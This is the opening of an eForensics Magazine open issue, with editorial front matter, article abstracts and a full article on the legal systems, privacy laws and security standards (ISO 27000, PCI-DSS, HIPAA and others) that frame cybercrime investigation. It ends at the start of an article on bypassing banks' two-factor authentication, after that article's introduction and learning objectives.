
TEAM

Editor:
Joanna Kretowicz
joanna.kretowicz@eforensicsmag.com
Betatesters/Proofreaders:
Olivier Caleff, Kishore P.V., JohanScholtz,
Mark Dearlove, Massa Danilo, Andrew
J. Levandoski, Robert E. Vanaman, Tom
Urquhart, M1ndl3ss, Henrik Becker,
JAMES FLEIT, Richard C Leitz Jr
Senior Consultant/Publisher:
Paweł Marciniak
CEO: Ewa Dudzic
ewa.dudzic@software.com.pl
Marketing Director: Joanna Kretowicz
joanna.kretowicz@eforensicsmag.com
Art Director: Ireneusz Pogroszewski
ireneusz.pogroszewski@software.com.pl
DTP: Ireneusz Pogroszewski
Publisher: Hakin9 Media Sp. z o.o. SK
02-676 Warszawa, ul. Postępu 17D
Phone: 1 917 338 3631
www.eforensicsmag.com

DISCLAIMER!
The techniques described in our articles
may only be used in private, local networks. The editors hold no responsibility
for misuse of the presented techniques or
consequent data loss.

Dear Readers,

We are pleased to present our new OPEN issue of eForensics Magazine, "CyberCrime and CyberSecurity", with open access, so that everybody interested in the subject can download it free of charge. This edition was carefully prepared to present our Magazine to a wider range of readers. We hope that you will enjoy reading it and that the subjects covered in this issue will help you stay updated and aware of all possible pitfalls!
This particular edition focuses on the importance of legal and regulatory aspects of cybersecurity and cybercrime. You cannot overestimate the importance and necessity of eForensic analysis in a society where the Internet represents the biggest ongoing change of our lifetime. We use forensic analysis to investigate crime; but to do that effectively we must understand which laws and regulations have been broken. It is crucial to understand which legal systems exist, the types of law, standards, types of cybercrime, the part played by the computer system and, of course, how to apply this knowledge.
Additionally, we will cover the topic of CSA STAR Certification, an effective way of evaluating and comparing cloud providers. Technological developments, constricted budgets, and the need for flexible access have led to an increase in business demand for cloud computing. Many organizations, however, are wary of cloud services due to apprehensions around security issues. eForensics Magazine, in cooperation with BSI GROUP, has prepared an excellent workshop where you can master the knowledge required to obtain CSA STAR Certification.
What's more, we have added one article from our Packet Analysis workshop as a trial. You can find more materials at
http://eforensicsmag.com/course/packetanalysis/.
Read our new issue and get all the answers you were looking for!
We would like to thank you for your interest and support and invite you to follow us on Twitter and Facebook, where you can find the latest news about our magazine and great contests. Do you like our magazine? Like it, share it! We appreciate every comment and would be pleased to know your expectations of our magazine!
Keep your information safe and do not forget to send us your feedback. Your opinion is important to us!
Valeriia Vitynska
eForensics Assistant Manager
and eForensics Team


CYBERCRIME AND CYBERSECURITY: THE LEGAL AND REGULATORY ENVIRONMENT
by Iana Fareleiro and Colin Renouf (p. 05)

ARE 2 FACTOR AUTHENTICATIONS ENOUGH TO PROTECT YOUR MONEY? TARGETING ITALIAN BANK AND CUSTOMERS
by Davide Cioccia and Senad Aruch (p. 14)

AN OVERVIEW OF CLOUD FORENSICS
by Dejan Lukan (p. 22)

AUTHENTICATING REMOTE ACCESS FOR GREATER CLOUD SECURITY
by David Hald, co-founder, chief relation officer (p. 27)

PACKET ANALYSIS WITH WIRESHARK AND PCAP ANALYSIS TOOLS
by Eric A. Vanderburg (p. 29)

UNDERSTANDING DOMAIN NAME SYSTEM
by Amit Kumar Sharma (p. 37)

In this article we will look at the environment in which eForensics exists; the legal and regulatory
regimes in which systems and cyber criminals operate. We perform forensic analysis on systems to
investigate a crime and hopefully prosecute a criminal; but to do that we need to understand which
laws and regulations have been broken. There are pitfalls in working out what laws and regulations
are in operation for a particular context; as what is illegal in one regime may not be in another, and
is it the law in the location of the system or the criminal that applies? The information here forms the
underlying legal knowledge in the CISSP certification and underpins the International Information
Systems Security Certification Consortium (ISC)2 body of knowledge.

During the last few years, banks and other financial institutions have been trying to prevent fraud and cyber-attacks from compromising their customers' credentials. They have increased security and added login factors to avoid these kinds of problems. One of these is Two Factor Authentication (2FA), used alongside the username and password to protect the bank account.

When discussing cloud forensics, we're actually talking about the intersection between cloud computing and network forensic analysis. Cloud computing basically refers to a network service that we can interact with over the network; this usually means that all the work is done by a server somewhere on the Internet, which might be backed by physical or virtual hardware. In recent years, there has been a significant increase in the use of virtualized environments, which makes it very probable that our cloud service is running somewhere in a virtualized environment.

The nature and pace of business have changed as technology has opened new possibilities for organizations. One of these possibilities is cloud services, which benefit companies by enabling remote
access to data stored offsite. Their convenience has made cloud services incredibly popular, both to businesses and to malicious actors. With so much data at stake, the rise in the use of remote access necessitates ironclad security. Authenticating the identities of users remotely accessing these resources
has never been more critical.

Almost every computer today is connected. Its communication with others takes the form of packets, which can be analyzed to determine the facts of a case. Packet sniffers are also called network analyzers, as they help in monitoring every activity that is performed over the network. The information from packet sniffing can be used to analyze the data packets and uncover the source of problems in the network. An important feature of packet sniffing is that it captures data that travels through the network, irrespective of the destination. A log file is generated at the end of every operation performed by the packet sniffer, containing the information related to the captured packets.

DNS spoofing, also referred to as DNS cache poisoning in the technical world, is an attack wherein junk (customized data) is added into the Domain Name System (DNS) name server's cache database, causing it to return incorrect data and thereby diverting traffic to the attacker's computer.


CSA CERTIFICATION OFFERS SIMPLE, COST EFFECTIVE WAY TO EVALUATE AND COMPARE CLOUD PROVIDERS
by John DiMaria (p. 49)

ROAD MAP TO CSA STAR CERTIFICATION: OPTIMIZING PROCESSES, REDUCING COST AND MEETING INTERNATIONAL REQUIREMENTS
by John DiMaria (p. 55)

EFORENSICS CSA STAR CERTIFICATION: SUPPLY CHAIN MANAGEMENT USING CSA STAR CERTIFICATION
by John DiMaria (p. 67)

CONTINUOUS MONITORING: CONTINUOUS AUDITING/ASSESSMENT OF RELEVANT SECURITY PROPERTIES
by John DiMaria (p. 70)

Technological developments, constricted budgets, and the need for flexible access have led to
an increase in business demand for cloud computing. Many organizations are wary of cloud services, however, due to apprehensions around security issues. Ernst & Young conducted a survey
of C-level leaders in 52 countries, which showed a unified concern over the accelerated rate at which companies are moving information to the cloud and the subsequent demise of physical boundaries and infrastructure.

For centuries, the Swiss dominated the watchmaking industry, and their national identity was somewhat tied to their expertise in the precision mechanics required to make accurate timepieces. Yet the Swiss were so passionate about their expertise that they hesitated to embrace the new watchmaking technology based on batteries and quartz crystals. With Japan's introduction of the quartz wristwatch in 1969, the Swiss majority market share dropped from 80% at the end of World War II to only 10% in 1974 (Aran Hegarty, "Innovation in the Watch Industry", Timezone.com, November 1996, http://people.timezone.com/library/archives/archives0097). Ironically, it was the Swiss who had invented the quartz watch but failed to see its potential.

When an organization adopts cloud services, it is in fact expanding its operations from a local or regional presence to a more global one. As a result, the corresponding organizational operations strategy needs to be adjusted to align with these changes. A more formal analysis of the supply-chain as
part of a more comprehensive due diligence review also needs to be considered (By definition, the
Cloud Controls Matrix (CCM) is a baseline set of security controls created by the Cloud Security Alliance to help enterprises assess the risk associated with a cloud computing provider).

While the Cloud Security Alliance's (CSA) STAR Certification has certainly raised the bar for cloud providers, any audit is still a snapshot of a point in time. What goes on between audits can still be a blind spot. To provide greater visibility, the CSA developed the Cloud Trust Protocol (CTP), an industry initiative which will enable real-time monitoring of a CSP's security properties, as well as providing continuous transparency of services and comparability between services on core security properties (Source: CSA CTP Working Group Charter). This process is now being further developed by BSI and other industry leaders. CTP forms part of the Governance, Risk, and Compliance stack and the Open Certification Framework as the continuous monitoring component, complementing point-in-time assessments provided by STAR certification and STAR attestation. CTP is a common technique and nomenclature to request and receive evidence and affirmation of current cloud service operating circumstances from CSPs.


CYBERCRIME AND
CYBERSECURITY
THE LEGAL AND REGULATORY ENVIRONMENT
by Iana Fareleiro and Colin Renouf

eForensic analysis has become essential and necessary in a society where the Internet represents the biggest ongoing change of our lifetime. It takes place as a result of a crime or an investigation. However, what is relevant and worth searching for, or even what can legally be analyzed, depends on the legal systems and regulations, the criminal and, maybe, even the customers or users affected.

What you will learn:


In this article we will look at the environment in which eForensics exists;
the legal and regulatory regimes in
which systems and cyber criminals
operate. We perform forensic analysis on systems to investigate a crime
and hopefully prosecute a criminal;
but to do that we need to understand which laws and regulations
have been broken. There are pitfalls
in working out what laws and regulations are in operation for a particular
context; as what is illegal in one regime may not be in another, and is it
the law in the location of the system
or the criminal that applies? The information here forms the underlying
legal knowledge in the CISSP certification and underpins the International Information Systems Security
Certification Consortium (ISC)2 body
of knowledge.

The laws broken may be existing laws pertaining to theft or threats of violence where the computer systems are central, or the computer system may be on the periphery of the crime, or it may be specific information systems or computer privacy laws and regulations that are relevant; possibly even a combination of all of them. These laws and regulations may conflict, and what is illegal in one country or region may not be illegal in another.
As cyber security experts we need to understand what we are aiming to prove and what data we can legally investigate before we begin our work.
In addition to existing laws within the legal systems at work, specific cyber laws were created to protect individuals, companies and governments against cyber crime; these can be divided into three categories:
Computer-assisted crime, where a computer is used as a tool to assist in committing a crime,
Computer-targeted crime, where a computer is the main target and victim of an attack,
The last category, which includes situations where the computer happens to be involved in a crime but is neither the attacker nor the victim, and is peripheral to the crime itself.
These categories were created to facilitate the law enforcement of cyber crimes. Laws can then be general and cover numerous scenarios, instead of specific laws having to be created for each individual case.


The idea is to use the existing laws for any crime where possible, allowing an easier understanding of
the basis for prosecution for all people involved, including the judge and jury, who can then provide the
verdict and sentence based on existing guidelines and standards.
The downside of introducing specific cyber laws is that, for example, when companies are attacked they often just want to ensure that the vulnerability exposed is fixed and to avoid any embarrassment that would adversely affect the company's reputation. Even when information about an attack leaks out, companies do not seem interested in spending time and money in the courts, preferring to minimize the period of embarrassment. This is the main reason why cyber criminals go unpunished and easily get away with such illegal actions. Not many companies wish to be known as the victim of a cyber attack, since that can adversely influence customer confidence and scare away investors.

LEGAL SYSTEMS

There are essentially four different models of legal systems; civil law, common law, religious law, and
customary law.

CIVIL LAW

In civil law, employed by most countries, a legislative branch of the government develops and documents statutes and laws, and then a judiciary has some latitude for interpreting them. The legislation is
prescriptive, so legal precedent, whilst existing, has little force. In some such systems, such as those derived from Roman law or the later Napoleonic code, the judge assesses the proof as a measure of the guilt
of the criminal.

COMMON LAW

This system, used in the UK, US, Canada, Australia and other former British colonies amongst others,
is often derived from the English legal system. A legislative branch of government still produces statutes
and laws, but great emphasis is placed on judicial interpretation, precedent and existing case law; which
can even override and supersede the legislation and statute if a conflict is found to occur. Thus, time is
important in this system as judicial interpretation may develop and traditional interpretation of custom
and natural law acts as a basis for the system. The judiciary and its interpretation of the legislation and
precedent in existing case law has a greater role in this system than in the civil law system. In the English legal system and its derivatives the role of the jury to interpret the evidence in assessing the burden
of proof is common.

RELIGIOUS LAW

In religious law, such as Sharia Law adopted by several Islamic countries and groups, religious texts and
doctrine provide the basis for the legal system, rather than separate statute and legislation. Here the given religion is accepted by the majority of the people or by their rulers, such that its teachings essentially become laws by which the people abide. The laws enforced may be interpreted from the appropriate religious texts by religious leaders, such as imams or ayatollahs.

CUSTOMARY LAW

In this system, existing regional customs accepted by the majority of the people over a period of time provide the basis for the legal system, to the extent that they essentially become laws by which the people abide. These customs may later be codified to some extent. This model is also visible within the other legal models, in the interpretation of duty of care and best practice as what would be expected of a "reasonable man"; such as in the tort law within the civil branch of common law.

TYPES OF LAWS

Within common law itself, civil law plays a part, alongside criminal law, tort law and administrative law.
As groups of countries collaborate, such as in the European Union (EU), the combinations become more
complex, but the types of law are common at the core due to the prevalence of the English legal system
and its derivatives in the UK, US, Australia, etc.

CRIMINAL LAW

In criminal law the aim is law and order for the common citizen and the deterrence of criminals when punishing offenders; so, from the view of the prosecution, the victim of the crime is considered to be society itself, even though the actual victim may be a person or persons. Hence the existence of the Crown Prosecution Service (CPS) in the UK for pursuing the criminal through the courts under criminal law, with
an aim to remove the offender from affecting society. The criminal is incarcerated or even deprived of
his or her life under some circumstances so there is an emphasis on burden of proof being beyond
reasonable doubt.

CIVIL LAW

Here the individual has been wronged and seeks legal recourse in terms of damages from a civil defendant, rather than loss of liberty, with the evidence essentially reduced from beyond all reasonable doubt
to a likelihood known as a preponderance, i.e. more likely than not. The damages for the wrongdoing
may be statutory as prescribed by law, compensatory to attempt to balance loss or injury, or punitive to
discourage and deter from future legal violation.

TORT LAW

This is a branch of civil law related to wrongdoing against an individual, measured against best practice or duty of care, where the action taken, or the negligence of responsibility, of an individual or organization is considered to be outside the bounds of behavior expected of a reasonable, right-thinking, or prudent man; in this it relates back to custom, and may often change over time. Here again, the burden of proof is the preponderance of the evidence weighing against the defendant. This is the largest source of lawsuits and damages under the major legal systems.
This is particularly important in the realm of cyber security laws. In protecting customer data the Prudent Man Rule is applied to set the bar for duty of care, in terms of what processes, infrastructure and practices a right-thinking person would consider necessary as a minimum. If a business is seen to fall below that bar of expectation then the organization and its stakeholders are considered negligent in providing the necessary due care to protect its customers, assets and business stakeholders.
A company has to exercise due diligence continuously in reviewing its own and third-party partners and processes to ensure that the necessary standard of due care is being met. As the technologies and threats in the industry adapt all of the time, due diligence ensures that the minimum bar changes accordingly. Whenever a new third party is brought into a company's processes, the necessary due diligence in assessing that party for past criminal history, threats and its own due care protection standards and due diligence processes must be performed.

CONTRACT LAW

Agreements between companies and individuals, whether verbal or documented in writing, can be broken, and damages for the wrongdoing can be sought. This is again a type of civil law.

ADMINISTRATIVE AND REGULATORY LAW

This covers governance, compliance and regulatory laws relating to government and government agencies. Governments enact these laws with less influence from the judiciary. Compliance laws, such as
Sarbanes-Oxley, come under this branch of the legal system.

INTELLECTUAL PROPERTY LAWS

One of the targets in many cyber crimes is stealing intellectual property, so companies go to great technical and legal lengths to protect it. Whilst intellectual property isn't physical in nature, companies require creativity and then investment to capitalize on it. It takes a number of forms, from trademarks, copyright, licenses and patents to even simple trade secrets that a company entrusts to its staff.
A trademark is a name, image or logo for a brand that is used in marketing and is associated with the brand by its customers and competitors; it may be formally registered or unregistered. Whilst stealing the logo itself is not usually a major criminal target, in phishing attacks a logo may be used to misrepresent the cyber criminal's web site as that of the company owning the brand.
Copyright is the right of an owner of a musical, artistic or literary work to own, duplicate, distribute and
amend that work themselves. Often cyber criminals will duplicate a copyrighted work and sell it or provide it for download as their own property.
A patent is a legal agreement protecting the use of an idea or invention such that the patent holder
has exclusive rights on the use and licensing of that idea for a period of time covered by the patent.
Some rogue nations and cyber criminals will ignore the patent and use the invention or idea as their own,
and legal recourse is then required by the patent holder to obtain compensation. A license is a contract
between a vendor and consumer or business to use software within the bounds of an end user license
agreement, and not to duplicate, modify, redistribute or sell on that software.
A trade secret is proprietary information belonging to a business in a competitive market that its staff
and third parties should not divulge, and is often subject to a non-disclosure agreement (NDA) that is
a contract between the business and a third party or employee to not divulge that secret. The business
must exercise due care to protect that trade secret.

DATA PRIVACY LAWS

With the rise in cyber crime, and the stealing of customer data being a regular objective of the cyber criminal, most countries and states have introduced their own data protection laws. These cover the processes and expected standard of behavior for protecting data, but often also include clauses as to where that data can be located, and with what countries and under what circumstances it can be shared.
In the US the Privacy Act of 1974 protects the data held by the US government on its citizens, and how it is collected, transferred between departments, and used; with individuals having legal recourse in being able to request access to the data held about them, national security providing the main limitation to that access. Similarly, in the European Union the EU Data Protection Directive sets the boundaries on the collection and flow of personal data between member nations; with a fine line between the needs of commerce between different member nations and the privacy of the individual. The EU principles are considered more stringent than those of the US, so the EU-US Safe Harbor legal framework allows EU data to be shared with US organizations if they adhere to the more stringent EU Data Protection Directive principles.
The EU Data Protection Directive principles are:

Individuals must be notified how their personal data is collected and used
Individuals must be able to opt out of sharing their data with third parties
Individuals must opt in to share sensitive personal data
Reasonable protections must be in place to protect the personal data

This latter rule brings in the duty of care legal measure.


Title 18, Section 1030 of the United States Code, usually known as the Computer Fraud and Abuse Act, defines the environment in which systems in government and commercial organizations are considered to have been attacked and the recourse against the criminal. This was amended by the Patriot Act of 2001, as a response to the September 11th attacks, to allow easier implementation of wiretaps by law enforcement agencies and easier sharing of data between those agencies, along with more stringent punishment for damaging a protected system covered by the original act or dealing with individuals on the sanctions list.
The Identity Theft Act further amends the original act to provide additional protection for the individual.

STANDARDS

International bodies, industries, and some groups of companies may produce their own standards with which individuals and companies may comply; claiming such compliance may be a requirement for taking part in that industry from a financial or regulatory perspective, or may be required as part of a contract. So, companies supporting payments with debit and credit cards usually have to adhere to the PCI-DSS standards mandated by the card industry vendors, and health service vendors in the US must deliver to HIPAA data security standards for patient data as mandated by US administrative law.
In the early days of networked IT (1995) the British Standards Institution started to develop BS7799, which outlines how an information security management system should be designed, built and maintained; with guidelines on what is necessary in the form of policies and processes, along with the technologies necessary to holistically protect sensitive information from the physical, to the network, to the electronic.
From this the ISO/IEC 27000 standards were developed, using an iterative process where objectives and plans are formed (Plan), then implemented (Do), the results measured to see if the objectives were met (Check), and then amendments made as necessary (Act); the whole iterative process is known as the PDCA cycle.


ISO27000

The ISO and International Electrotechnical Commission (IEC) standards bodies jointly issue the ISO27000
Information Technology Security Techniques family of standards for information security management
best practice for risks and controls; which was, as mentioned, derived from the earlier BS7799 British
Standard and the later ISO/IEC 17799 standard. These bodies have a committee called Joint Technical
Committee 1 (JTC 1) Subcommittee 27 SC27 that meets twice a year to consider and ratify the standards and amendments to provide the information security management system (ISMS), with the 27000
base standard providing an overview of the complete family of policy-oriented standards and the vocabulary used throughout. The individual standards are as follows:
27000 - Information security management systems: Overview and vocabulary
27001 - Information security management systems: Requirements
27002 - Code of practice for information security management
27003 - Information security management system implementation guidance
27004 - Information security management: Measurement
27005 - Information security risk management
27006 - Requirements for bodies providing audit and certification of information security management systems
27007 - Guidelines for information security management systems auditing
27008 - Guidance for auditors on ISMS controls
27010 - Information security management for inter-sector and inter-organizational communications
27011 - Information security management guidelines for telecommunications organizations based on ISO/IEC 27002
27013 - Guideline on the integrated implementation of ISO/IEC 27001 and ISO/IEC 20000-1
27014 - Information security governance
27015 - Information security guidelines for financial services
27017 - Information security management for cloud systems
27018 - Data protection for cloud systems
27019 - Information security management guidelines based on ISO/IEC 27002 for process control systems specific to the energy utility industry
27031 - Guidelines for information and communication technology readiness for business continuity
27032 - Guideline for cybersecurity
27033 - IT network security, a multi-part standard based on ISO/IEC 18028:2006
27033-1 - Network security, Part 1: Overview and concepts
27033-2 - Network security, Part 2: Guidelines for the design and implementation of network security
27033-3 - Network security, Part 3: Reference networking scenarios; threats, design techniques and control issues
27033-5 - Network security, Part 5: Securing communications across networks using Virtual Private Networks (VPNs)
27034-1 - Application security, Part 1: Guidelines for application security
27035 - Information security incident management
27036 - Information security for supplier relationships
27036-3 - Information security for supplier relationships, Part 3: Guidelines for information and communication technology supply chain security
27037 - Guidelines for identification, collection, acquisition and preservation of digital evidence
27038 - Specification for redaction of digital documents
27039 - Intrusion detection and protection systems
27040 - Guideline on storage security
27041 - Assurance for digital evidence investigation methods
27042 - Analysis and interpretation of digital evidence
27043 - Digital evidence investigation principles and processes
27799 - Information security management in health using ISO/IEC 27002


These aren't laws, but many contracts will insist that participants adhere to the complete body of the standard, or to its individual components. Adherence to the standard or its components can also be used as a quality measure and can act as a selling point, and in negotiations this can be important. Therefore, this standard can appear in the enacting of contract law.
The individual components cover investigation and forensic analysis, as well as relationships with third parties. However, one of the key areas where the standard impacts the legal environment for cyber security is in the influence it has had on other standards and regulations that can be enforced as the cost of doing business in some industries, e.g. PCI-DSS in companies involved in credit card sales. When evaluating compliance, or where criminal responsibility is being assessed, ISO/IEC 27000 provides a basis by which what is expected of the "reasonable man" can be measured from a legal perspective.

INFORMATION TECHNOLOGY INFRASTRUCTURE LIBRARY (ITIL)

ITIL, like the foundations of ISO/IEC 27000, was developed by the UK government, with the aim of standardizing and documenting service management and aligning IT with the business through a common language. IT should provide good customer service to the business it serves. Whilst not providing a security framework, it does cover support, change and maintenance processes and all of the foundations for business continuity and disaster recovery management, with great strength in incident management.
It covers supplier management, service level management, service catalog management, availability
management, incident management, event management, problem management, change management,
knowledge management, release and deployment management, service testing and validation, and the
requirements of a configuration management system. It has processes for service design, service operation and service transition. Across all of this is continual process improvement as a result of service
reporting and service measurement. At the core of ITIL is the concept of IT as a service.
Again, ITIL is referenced in contracts and often used as a selling point, but in the legal world outside of contracts it is more useful as a measure of the expectations of the "reasonable man".

CONTROL OBJECTIVES FOR INFORMATION AND RELATED TECHNOLOGIES (COBIT)

This was produced by the Information Systems Audit and Control Association in 1996 as a general
framework of processes, policies, and governance for the management of IT as a whole, not just security; and the current version aligns with ITIL and ISO27000 standards to provide a full framework and
model for IT as the basis of a capability maturity model.
It splits IT into domains: Plan and Organize; Acquire and Implement; Deliver and Support; and Monitor and Evaluate; and across these it includes a framework, process descriptions, control objectives, management guidelines, and maturity models.
Whilst ISO27000 provides high level guidelines and processes, the COBIT model contains specific details, such as for user access management and compliance, and how to work with third parties; with a
lot of helpful security details particularly in the Plan and Organize, and Acquire and Implement domains;
with the processes heavily emphasized in the other two domains.
Again, as with ISO/IEC 27000, COBIT is often referenced as a selling point or in contracts, but it also provides specific processes that tie up with the "reasonable man" assessment from a legal perspective.

PAYMENT CARD INDUSTRY DATA SECURITY STANDARD (PCI-DSS)

The major card companies (e.g. Visa, MasterCard, American Express, JCB, etc) got together in 2006 to
come up with a set of standards for data security that could be measured and enforced for companies
wishing to participate in payment card processing. Annually a Qualified Security Assessor (QSA) creates
a report on compliance to the standards that are split into 12 requirements in 6 groups.


Control Objectives and PCI-DSS Requirements:

Build and Maintain a Secure Network
1. Install and maintain a firewall configuration to protect cardholder data
2. Do not use vendor-supplied defaults for system passwords and other security parameters

Protect Cardholder Data
3. Protect stored cardholder data
4. Encrypt transmission of cardholder data across open, public networks

Maintain a Vulnerability Management Program
5. Use and regularly update anti-virus software on all systems commonly affected by malware
6. Develop and maintain secure systems and applications

Implement Strong Access Control Measures
7. Restrict access to cardholder data by business need-to-know
8. Assign a unique ID to each person with computer access
9. Restrict physical access to cardholder data

Regularly Monitor and Test Networks
10. Track and monitor all access to network resources and cardholder data
11. Regularly test security systems and processes

Maintain an Information Security Policy
12. Maintain a policy that addresses information security

The aim of the PCI-DSS standards is to ensure consistency across the card payments industry in the way that customer details and the card data necessary for making payments are protected and handled. It covers requirements for technology, processes and the relationships with the business and the staff involved. From a customer perspective this acts to protect customers, in that companies adhering to the PCI standards can be trusted to look after the data, and later fraud would be unexpected. Reviews of continued compliance are required of any company adopting PCI, with the QSA making an assessment and recommendations for any areas of improvement required.
So, adherence to PCI is usually contractual, which is how it relates to the law; yet again, anyone dealing with payment card data would be expected to follow the recommendations within the standard and this thus fits with the "reasonable man" assessment within legal frameworks. Whilst US federal law doesn't mandate that companies adhere to PCI-DSS if dealing with card data, the laws in some states within the US and elsewhere do refer to it, so it is likely to become the law in the future. MasterCard and Visa require service providers and merchants to be validated for PCI-DSS compliance, and banks must be audited, whereas validation isn't mandatory for all entities.

HEALTH INSURANCE PORTABILITY AND ACCOUNTABILITY ACT (HIPAA)

The HIPAA act is a US federal law that covers many areas, but part of it also includes standards for data
privacy that overlap with the data privacy laws in some countries and also tie back to the "reasonable man" rule in the gray area between law and standard. Therefore, many information security certifications (such as the CISSP) and standards reference the act and its standards worldwide. The objective of the HIPAA
regulatory framework was to provide a secure way for the health insurance of US citizens to be shared
between providers when changing or losing jobs, ensuring the citizens not only had any confidential personal information or medical condition information protected physically, but also that the policies were in
place to ensure their health insurance benefit position was maintained.
The act is in two parts. The first part (Health Care Access, Portability, and Renewability) covers the policies by which US citizens maintain their health insurance across providers and what their entitlement is when switching providers; as such it isn't applicable to the information security realm at the detail level. The second part (Preventing Health Care Fraud and Abuse; Administrative Simplification; Medical Liability Reform) and its details on data privacy are more relevant to information security professionals, and it is here that granular standards exist and there is an overlap with data privacy laws elsewhere.
The Privacy Rule and Security Rule subsections are key here, and the latter includes the standards. The
Security Rule is split into Administrative Safeguards, Physical Safeguards and Technical Safeguards
and includes standards for encryption, checksums, etc., as well as risk management and risk assessment processes. In interpreting adherence to these process standards the "reasonable man" rule is again brought into use from a legal perspective, as the prescriptiveness of the standards is open to interpretation and applicability at many levels.

NATIONAL INSTITUTE OF STANDARDS AND TECHNOLOGY (NIST)

This is not like the other sections here, in that it refers to a standards issuing body as a whole, like the ISO/IEC or BSI bodies referenced earlier; but it is mentioned due to its issuing of very detailed build, hardening, and usage standards for IT and security that are often referenced by other standards (e.g. they are often used as best practice build and configuration standards for PCI-DSS compliance) and again act as a yardstick for the "reasonable man" rule in assessing whether a reasonable attempt was made to secure data.
NIST maintains an Information Technology Portal with a standard Cybersecurity Framework, the Computer Security Resource Center, and other documentation and groups: http://www.nist.gov/.
The US government maintains standard configuration documents for Windows 7 and Red Hat Enterprise Linux 5 on this site that show how builds should be done. Of more interest beyond the "reasonable man" debate are the standards and guidelines for eForensic analysis.

THE PART OF THE COMPUTER SYSTEM

The computer may be a key part of the criminal or civil act, as in the breaking of cyber laws; or may be a
peripheral part of the crime itself, as in electronic fraud; or may just be a part of the evidence gathering
to build a picture of the crime or criminal. The legal systems and industry standards have specific definitions for the role of the computer system in these contexts.
Where the computer plays a role as a tool of the criminal, but the crime is general even though the computer is central to the commission of the crime, this is known as a "computer as tool" scenario. Stealing credit card information to commit fraud or penetrating a system to steal company intellectual property secrets would be examples of this scenario.
Scenarios where the computer is the primary target or victim of the crime, particularly where information or cyber security laws are broken, are "computer as target" scenarios. Hacking to install malware, deployment of computer viruses, and distributed denial of service attacks would all be examples of this scenario.

TYPES OF CYBER CRIME

A crime being forensically investigated may involve the breaking of an existing law relating to theft or a violent act; fraud using a computer is still fraud and a threat of violence online is still a threat of violence, and a computer could be used in hacking to bring about violence or death.
It may also be that an investigation is required because a specific cyber law has been broken pertaining only to the use of a computer, such as hacking or denial of service for fun or political motivation.
Finally, regulations that are legal and contractual in nature may be broken using a computer; a system built to Payment Card Industry Data Security Standard compliance may be a key term in a contract, so non-compliance with the regulations leads to a contractual violation.

HOW DO WE APPLY THIS KNOWLEDGE?

To perform forensic analysis we obviously first have to protect the evidence, but what evidence we are allowed to access, and what is useful, requires first understanding which laws are believed to have been broken, the role of the computer, and what laws are in place for the analyst doing the work. It isn't necessarily legal to perform forensic analysis and access the personal data of a potential criminal without breaking a privacy law.
The most difficult tasks are when the criminal is in one country or state, the target system is in another,
the victim in yet another, and multiple countries have been traversed. Even within a single country like
Australia or the United States different laws can apply state to state. The complexity is why so many
computer related crimes remain unprosecuted, along with the shame for a company in having been
breached. The key to applying the legal knowledge before doing what is needed to achieve a prosecution
is identifying what is common between the states and countries involved, and new international frameworks of cooperation are being drawn up to assist in this.


INTERNATIONAL LEGAL COOPERATION IN CYBER SECURITY

The increase in cyber crime and the need for coordinated anti-terrorist cooperation across state and international boundaries have led to frameworks being drawn up, such as the Safe Harbor cooperation between the EU and US. More international work between governments is currently underway to make this easier, driven initially not by basic cybercrime but by the need to combat terrorism and terrorist funding. The trick is to identify a common subset covering protection against fraud and of personal data, work out from that the maximum commonality between all the legal state or national entities, and then aim to prosecute in the area where the criminal is most likely to be sentenced; remembering that avoiding breaking the law during the analysis in any of the states or nations involved in the forensic investigation is a necessity.
Post-graduate degrees specifically covering international cyber crime and security are beginning to
spring up; such as that being studied by the authors. Personal experience has shown that the specific
state knowledge of experienced lawyers can come to nothing in this internationally complex area, so
specializations in this niche area are likely to grow in importance.

THE INTERNATIONAL, FEDERAL AND STATE INTERPRETATION WHICH LAWS APPLY?

In determining which laws apply to a particular scenario there are four separate considerations that may
include different states, countries, and even international groups, such as the EU. When a possible crime
occurs involving a computer and data in the modern world, to work out which laws apply we must consider the location of the cyber criminal, the location of the system being attacked, the location of any victims, and the locations through which the data forming the attack passes.

CRIME APPLICABILITY AND INVESTIGATION AN EXAMPLE

Consider a mobile phone payments application for purchasing foreign currency for international travellers. The user is from the UK, lands in Singapore, but uses a cellphone tower in Malaysia to enact transactions hosted on a system in Australia. Which laws apply? In this example, certain compliance restrictions on checking transactions in Malaysia and Singapore may mean that the application should use
geolocation and cell tower identification to shut down to avoid an impossible legal situation. In forensic
analysis after the fact where access to personal data might be restricted where the analysis is performed,
this gets even more complex.
So, if a crime is deemed to have occurred, consider the issue of identifying which country the crime has been committed in. Then assess which police forces or agencies will prosecute. However, taking the example of the different privacy acts enforced under EU, US, Australian, New Zealand law, etc., even sharing the evidence with the police forces can be an issue, because the personal data of the individual can only be seen by authorised agents of their own country. Often it's best to segregate the data and even store it locally in the given country (as is required for many Chinese financial systems) to avoid the complexities and give the best chance of prosecuting the criminal.

WHAT HAVE WE LEARNED?

We have looked at the basic types of legal system and how they differ in different countries, and the different types of laws and regulations that can be broken with different results for the defendant or perpetrator.
We have then applied this to examples using computers to see how complex the environment is under
which cyber security experts must operate to investigate a crime and see what laws and regulations apply.
ABOUT THE AUTHORS

Colin Renouf is a long-standing IT worker, inventor, and author; currently an Enterprise Solution Architect in the finance industry, but having worked in multiple roles and industries over a period of decades. An eternal student, Colin has studied varied
subjects in addition to IT. Having written and contributed to several books and articles on subjects ranging from IT architecture,
Java, dyslexia, cancer, and security; he is even referenced on one of the most fundamental patents in technology and has been
involved in the search for the missing MH370 aircraft. Colin has two incredibly smart and intelligent children; Michael and Olivia;
who he loves very much. He would like to thank his co-author and best friend Iana; her lovely sister Taina, brother Tiago, mother
Marciaa, and father Jose. What more is there to say, but thank you Red Bull.
Iana Fareleiro works as an analyst as part of a fraud and compliance team for a payments card business and is studying a postgraduate cybersecurity and cybercrime course. Originally from Brazil, and having lived in Mozambique, South Africa and Zimbabwe, and eventually Portugal; she now lives in the UK in Peterborough. She is a movie buff of old, and a scientist at heart who
gets great enjoyment out of intellectual argument with like-minded individuals. She would like to thank her sister Taina, brother
Tiago, mother Marciaa, and father Jose; and boyfriend Luis.

ARE 2 FACTOR
AUTHENTICATIONS
ENOUGH TO PROTECT
YOUR MONEY?
TARGETING ITALIAN BANK AND CUSTOMERS
by Davide Cioccia and Senad Aruch

During the last few years, banks and other financial institutions have been trying to prevent fraud and cyber-attacks from compromising their customers' credentials. They have increased security and added login factors to avoid these kinds of problems. One of these is Two Factor Authentication (2FA), used alongside the username and password to protect the bank account.

What you will learn:


How financial cybercrime is evolving
How new mobile-based security solutions are bypassed
How an attacker can control and steal your money

What you should know:


